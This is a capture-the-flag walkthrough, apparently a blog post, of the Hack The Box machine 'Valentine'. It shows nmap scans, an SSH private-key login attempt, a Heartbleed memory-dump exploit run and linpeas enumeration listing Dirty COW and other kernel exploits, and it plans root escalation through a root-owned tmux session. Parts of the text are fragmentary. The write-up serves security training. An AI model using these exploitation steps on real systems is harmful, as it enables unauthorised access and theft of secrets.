โโโ(kali๐kali)-[~]
โโ$ sudo nmap -sC -sV -O 10.10.10.79
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_ssl-date: 2024-01-03T06:05:58+00:00; -3s from scanner time.
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after: 2019-02-06T00:45:25
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/3%OT=22%CT=1%CU=35325%PV=Y%DS=2%DC=I%G=Y%TM=6594F
OS:94C%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=8)S
OS:EQ(SP=105%GCD=1%ISR=10D%TI=Z%CI=Z%TS=8)SEQ(SP=106%GCD=1%ISR=10E%TI=Z%CI=
OS:Z%II=I%TS=8)OPS(O1=M53AST11NW4%O2=M53AST11NW4%O3=M53ANNT11NW4%O4=M53AST1
OS:1NW4%O5=M53AST11NW4%O6=M53AST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3
OS:890%W6=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M53ANNSNW4%CC=Y%Q=)T1(R=Y%DF=Y%T=
OS:40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=3890%S=O%A=S+%F=AS%O=
OS:M53AST11NW4%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%D
OS:F=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O
OS:=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
โโโ(kali๐kali)-[~]
โโ$ sudo nmap -sU -O 10.10.10.79
5353/udp open zeroconf
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
/index, /omg and /server-status lead nowhere. /encode and /decode seem to be scripts that encode and decode strings. /dev on the other hand proves to be interesting.
http://10.10.10.79/dev/
http://10.10.10.79/dev/notes.txt To do:
Coffee.
Research.
Fix decoder/encoder before going live.
Make sure encoding/decoding is only done client-side.
Don't use the decoder/encoder until any of this is done.
Take the converted text format and save it into a hype_key file. Disclaimer: You should NEVER enter your or anyone elseโs credentials in online tools just in case it gets logged at the backend! In this case, it doesnโt matter since this is a fake security assessment.
Weโll try and ssh using our newly found private key. Based on the naming convention of pub/priv keys, โhypeโ is likely the username.
-i: Selects a file from which the identity (private key) for RSA authentication is read.
I get back the following error.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'hype_key' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "hype_key": bad permissions
hype@10.10.10.79's password:
Since a private key is equivalent to a password, it should only be readable by you. We resolve the error using the following command.
However, we are prompted for a password that we still donโt have and so we need to do more enumeration.
โโโ(kali๐kali)-[~/Desktop]
โโ$ ssh -i hype_key hype@10.10.10.79
Enter passphrase for key 'hype_key':
Enumeration: HTTPS TCP Port 443
Run nmapโs vulnerability scan script to determine if any of the services are vulnerable.
โโโ(kali๐kali)-[~/Desktop]
โโ$ nmap --script vuln 10.10.10.79
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_ /index/: Potentially interesting folder
443/tcp open https
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.securityfocus.com/bid/70574
| https://www.imperialviolet.org/2014/10/14/poodle.html
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| http://cvedetails.com/cve/2014-0160/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_ http://www.openssl.org/news/secadv_20140407.txt
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_ /index/: Potentially interesting folder
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.cvedetails.com/cve/2014-0224
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_ http://www.openssl.org/news/secadv_20140605.txt
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Port 443 is running a version of OpenSSL that is vulnerable to Heartbleed!
If you donโt know what that is, hereโs a great comic explaining it. It is essentially a vulnerability in the popular OpenSSL cryptographic software library. This vulnerability allows anyone on the Internet to read the memory of the systems protected by this vulnerable version of OpenSSL. This can lead to the compromise of secret keys, passwords, information, etc. It also allows attackers to eavesdrop on communications. Thereโs a whole site dedicated to the heardleed bug.
Heartbleed exploit
Now that we know for sure that port 443 is running a vulnerable version of OpenSSL, letโs try and exploit it to gain an initial foothold on the target machine.
First, get the exploit
Run the script to view the help instructions.
โโโ(kali๐kali)-[~/Desktop/10174134]
โโ$ python heartbleed.py
defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)
Usage: heartbleed.py server [options]
Test and exploit TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)
Options:
-h, --help show this help message and exit
-p PORT, --port=PORT TCP port to test (default: 443)
-n NUM, --num=NUM Number of times to connect/loop (default: 1)
-s, --starttls Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...
-f FILEIN, --filein=FILEIN
Specify input file, line delimited, IPs or hostnames
or IP:port or hostname:port
-v, --verbose Enable verbose output
-x, --hexdump Enable hex output
-r RAWOUTFILE, --rawoutfile=RAWOUTFILE
Dump the raw memory contents to a file
-a ASCIIOUTFILE, --asciioutfile=ASCIIOUTFILE
Dump the ascii contents to a file
-d, --donotdisplay Do not display returned data on screen
-e, --extractkey Attempt to extract RSA Private Key, will exit when
found. Choosing this enables -d, do not display
returned data on screen.
Letโs run the exploit with a loop number of 10. We might have to run the script multiple times or increase the loop size depending on how useful the content of the memory dump is.
We get back many results of which two are interesting.
First, itโs running an old version of Ubuntu that is probably vulnerable to DirtyCow. Dirty COW is a privilege escalation vulnerability which exploits a race condition in the way the Linux kernelโs memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings.
Linux version 3.2.0-23-generic (buildd@crested) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu4) ) #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012
Second, thereโs an active tmux session that is owned by root.
โโโโโโโโโโโโฃ Searching root files in home dirs (limit 30)
/home/
/home/hype/.tmux.conf
tmux is a terminal multiplexer: it enables a number of terminals to be
created, accessed, and controlled from a single screen.
http://man7.org/linux/man-pages/man1/tmux.1.html
โโโโโโโโโโโโฃ Executing Linux Exploit Suggester 2
โ https://github.com/jondonas/linux-exploit-suggester-2
[1] dirty_cow
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[2] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[3] msr
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
[4] perf_swevent
CVE-2013-2094
Source: http://www.exploit-db.com/exploits/26131
โโโโโโโโโโโโฃ Active Ports
โ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
โโโโโโโโโโโโฃ Users with console
backup:x:34:34:backup:/var/backups:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
games:x:5:60:games:/usr/games:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
hype:x:1000:1000:Hemorrhage,,,:/home/hype:/bin/bash
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
root:x:0:0:root:/root:/bin/bash
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
Itโs essentially a shell that is owned by root! So if we can enter this active tmux session, any command we run there is executed with root privileges. This one I didnโt figure out on my own, I had to use
Alright, so we have two ways of escalating privileges.
Privilege Escalation #1: Dirty COW Vulnerability
To confirm that the target machine is vulnerable to Dirty COW, download the Linux Exploit Suggester script. In the attack machine, start up a server in the directory where the script resides.
